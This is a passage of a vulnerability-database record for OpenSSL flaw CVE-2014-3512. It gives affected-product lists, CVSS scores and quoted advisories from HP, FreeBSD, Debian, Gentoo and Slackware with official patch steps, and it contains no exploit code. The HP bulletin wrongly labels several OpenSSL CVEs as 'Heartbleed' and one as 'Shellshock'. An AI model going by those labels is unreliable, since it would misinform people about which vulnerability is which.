"model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "proventia network security controller 1.0.3350m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "9.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "9.2-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "8.2-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1768" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "-release-p42", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.4" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "6.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "6.4-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null } ], "sources": [ { "db": "BID", "id": "69083" }, { "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "db": "CNNVD", "id": "CNNVD-201408-129" }, { "db": "NVD", "id": "CVE-2014-3512" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-3512" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sean Devlin and Watson Ladd from Cryptography Services, NCC Group.", "sources": [ { "db": "BID", "id": "69083" }, { "db": "CNNVD", "id": "CNNVD-201408-129" } ], "trust": 0.9 }, "cve": "CVE-2014-3512", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 7.5, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2014-3512", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-3512", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201408-129", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-3512", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3512" }, { "db": "JVNDB", "id": "JVNDB-2014-003817" }, { "db": "CNNVD", "id": "CNNVD-201408-129" }, { "db": "NVD", "id": "CVE-2014-3512" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple buffer overflows in crypto/srp/srp_lib.c in the SRP implementation in OpenSSL 1.0.1 before 1.0.1i allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via an invalid SRP (1) g, (2) A, or (3) B parameter. OpenSSL is prone to a denial-of-service vulnerability. \nAttackers may exploit this issue to overrun an internal buffer, resulting in a denial-of-service condition. \nOpenSSL 1.0.1 versions prior to 1.0.1i are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04595951\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04595951\nVersion: 1\n\nHPSBHF03293 rev.1 - HP Virtual Connect 8Gb 24-Port FC Module running OpenSSL\nand Bash, Remote Denial of Service (DoS), Code Execution, Disclosure of\nInformation\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-03-13\nLast Updated: 2015-03-13\n\nPotential Security Impact: Remote Denial of Service (DoS), code execution,\ndisclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Virtual\nConnect 8Gb 24-Port FC Module running OpenSSL and Bash including:\n\n - The OpenSSL vulnerability known as \"Heartbleed\" which could be exploited\nremotely resulting in Denial of Service (DoS) or disclosure of information. \n - The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely\nresulting in disclosure of information. \n - The Bash Shell vulnerability known as \"Shellshock\" which could be\nexploited remotely resulting in Denial of Service (DoS) or execution of code. \n\nReferences:\nCVE-2009-3555\n Unauthorized Modification\n\nCVE-2014-0160\n Heartbleed - Disclosure of Information\n\nCVE-2014-0195\n Remote Code Execution, Denial of Service (DoS)\n\nCVE-2014-3505\n Heartbleed - Remote Denial of Service (DoS)\n\nCVE-2014-3506\n Heartbleed - Remote Denial of Service (DoS)\n\nCVE-2014-3507\n Heartbleed - Remote Denial of Service (DoS)\n\nCVE-2014-3508\n Heartbleed - Remote Denial of Service (DoS)\n\nCVE-2014-3509\n Heartbleed - Remote Denial of Service (DoS)\n\nCVE-2014-3510\n Heartbleed - Remote Denial of Service (DoS)\n\nCVE-2014-3511\n Heartbleed - Remote Denial of Service (DoS)\n\nCVE-2014-3512\n Heartbleed - Remote Denial of Service (DoS)\n\nCVE-2014-3566\n POODLE - Remote Disclosure of Information\n\nCVE-2014-5139\n Shellshock - Remote Denial of Service (DoS)\n\nSSRT101846\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Virtual Connect 8Gb 24-Port FC Module prior to version 3.00 (VC 4.40)\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2009-3555 (AV:N/AC:M/Au:N/C:N/I:P/A:P) 5.8\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3505 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3506 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3507 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-3508 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-3509 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3510 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-3511 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-3512 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-3566 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-5139 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has released the following software update to resolve the vulnerabilities\nin HP Virtual Connect 8Gb 24-Port FC Module\n\n HP Virtual Connect 8Gb 24-Port FC Module version 3.00 (VC 4.40)\n\nHISTORY\nVersion:1 (rev.1) - 13 March 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n=============================================================================\nFreeBSD-SA-14:18.openssl Security Advisory\n The FreeBSD Project\n\nTopic: OpenSSL multiple vulnerabilities\n\nCategory: contrib\nModule: openssl\nAnnounced: 2014-09-09\nAffects: All supported versions of FreeBSD. \nCorrected: 2014-08-07 21:04:42 UTC (stable/10, 10.0-STABLE)\n 2014-09-09 10:09:46 UTC (releng/10.0, 10.0-RELEASE-p8)\n 2014-08-07 21:06:34 UTC (stable/9, 9.3-STABLE)\n 2014-09-09 10:13:46 UTC (releng/9.3, 9.3-RELEASE-p1)\n 2014-09-09 10:13:46 UTC (releng/9.2, 9.2-RELEASE-p11)\n 2014-09-09 10:13:46 UTC (releng/9.1, 9.1-RELEASE-p18)\n 2014-08-07 21:06:34 UTC (stable/8, 8.4-STABLE)\n 2014-09-09 10:13:46 UTC (releng/8.4, 8.4-RELEASE-p15)\nCVE Name: CVE-2014-3506, CVE-2014-3507, CVE-2014-3508, CVE-2014-3510,\n CVE-2014-3509, CVE-2014-3511, CVE-2014-3512, CVE-2014-5139\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. \n\nI. Background\n\nFreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured\nOpen Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII. [CVE-2014-5139]\n\nIII. Impact\n\nA remote attacker may be able to cause a denial of service (application\ncrash, large memory consumption), obtain additional information,\ncause protocol downgrade. Additionally, a remote attacker may be able\nto run arbitrary code on a vulnerable system if the application has been\nset up for SRP. \n\nIV. Workaround\n\nNo workaround is available. \n\nV. Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\n2) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.0]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-10.0.patch.asc\n# gpg --verify openssl-10.0.patch.asc\n\n[FreeBSD 9.3]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.3.patch.asc\n# gpg --verify openssl-9.3.patch.asc\n\n[FreeBSD 9.2, 9.1, 8.4]\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch\n# fetch http://security.FreeBSD.org/patches/SA-14:18/openssl-9.patch.asc\n# gpg --verify openssl-9.patch.asc\n\nb) Apply the patch. Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in \u003cURL:http://www.FreeBSD.org/handbook/makeworld.html\u003e. \n\nRestart all deamons using the library, or reboot the system. \n\n3) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nVI. Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path Revision\n- -------------------------------------------------------------------------\nstable/8/ r269687\nreleng/8.4/ r271305\nstable/9/ r269687\nreleng/9.1/ r271305\nreleng/9.2/ r271305\nreleng/9.3/ r271305\nstable/10/ r269686\nreleng/10.0/ r271304\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\n\u003cURL:http://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\u003e\n\nVII. References\n\n\u003cURL:https://www.openssl.org/news/secadv_20140806.txt\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3506\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3507\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3508\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3509\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3510\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3511\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3512\u003e\n\n\u003cURL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5139\u003e\n\nThe latest revision of this advisory is available at\n\u003cURL:http://security.FreeBSD.org/advisories/FreeBSD-SA-14:18.openssl.asc\u003e\n-----BEGIN PGP SIGNATURE-----\n\niQIcBAEBCgAGBQJUDtUBAAoJEO1n7NZdz2rnOUoP/jNoEEPVt1RoVPQoOQc6vno5\n2HXcCDsu0ql3kCNIIZ7E6TddfduzV04EMzBrIgulg7eXft+Lnx6HlEgJOo7QLImc\naWLWxjcbyby6wrbYOc+FLK11yx9/uZJF0VCdSeyzhy0EFD3tOZPsDMXKZmG7FRkg\n6A7ENJU25Mx8V1myzHw/VfDwAHCtXHliFVVE0CUku55pYnlhMeetu/wuB6KYbmgV\n1WUamiHEGl4Dh4Up7nGHYYm32kqZLaE+cf1Ovc2VGT98ZyXmCgDB4+8kkA/HZxxp\nDRgQlojeQhahee5MmzD+wMJXlq6dekoo+JVf22+Nb+oNmlKT6/UxtUhCwW11MLUV\nrnOMr3u1JCNvBc+3KroSmtFeEtqh7jx3Ag4w8lS5mJO+wX1/lilbsFxSS/9G65fy\nLqHUQSxkuDJ1bNzPfKreBPyUmQlG5t/3DonIDCF9r3sefDN+kxqe1+RwjdNRM0ov\nV7OH/AW1NBQtV/F/h0tKCcskvcJo9Q+inAohheLPnWkFj7F2tLNt5TAxsGy7WvFZ\nMuQSAXpZkdh7OkhAhBM3Xk+EOv7Qk7zZL5HJ1Lpm6kfJ8wSb4etoUV7oELaDMBz8\n+9r+Vr9GtjSsec2a4tjNIixZKV9bzEhgKP5gsWD/JewhAzF+0bYNa9snOWxzpAYb\nj+eW9IT7pEAJK9DtIsDd\n=f4To\n-----END PGP SIGNATURE-----\n. \n\nAll applications linked to openssl need to be restarted. Alternatively, you may reboot your system. \n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.0.1e-2+deb7u12. \n\nFor the testing distribution (jessie), these problems will be fixed\nsoon. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.0.1i-1. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201412-39\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 26, 2014\n Bugs: #494816, #519264, #525468\n ID: 201412-39\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\ncould result in Denial of Service or Man-in-the-Middle attacks. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.1j *\u003e= 0.9.8z_p2\n \u003e= 1.0.1j\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe CVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll OpenSSL 1.0.1 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.1j\"\n\nAll OpenSSL 0.9.8 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-0.9.8z_p2\"\n\nPackages which depend on this library may need to be recompiled. Tools\nsuch as revdep-rebuild may assist in identifying these packages. \n\nReferences\n==========\n\n[ 1 ] CVE-2013-6449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6449\n[ 2 ] CVE-2013-6450\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6450\n[ 3 ] CVE-2014-3505\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3505\n[ 4 ] CVE-2014-3506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3506\n[ 5 ] CVE-2014-3507\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3507\n[ 6 ] CVE-2014-3509\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3509\n[ 7 ] CVE-2014-3510\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3510\n[ 8 ] CVE-2014-3511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3511\n[ 9 ] CVE-2014-3512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3512\n[ 10 ] CVE-2014-3513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3513\n[ 11 ] CVE-2014-3567\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3567\n[ 12 ] CVE-2014-3568\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3568\n[ 13 ] CVE-2014-5139\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-5139\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-39.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1i-i486-1_slack14.1.txz: Upgraded. \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zb-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zb-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zb-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zb-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 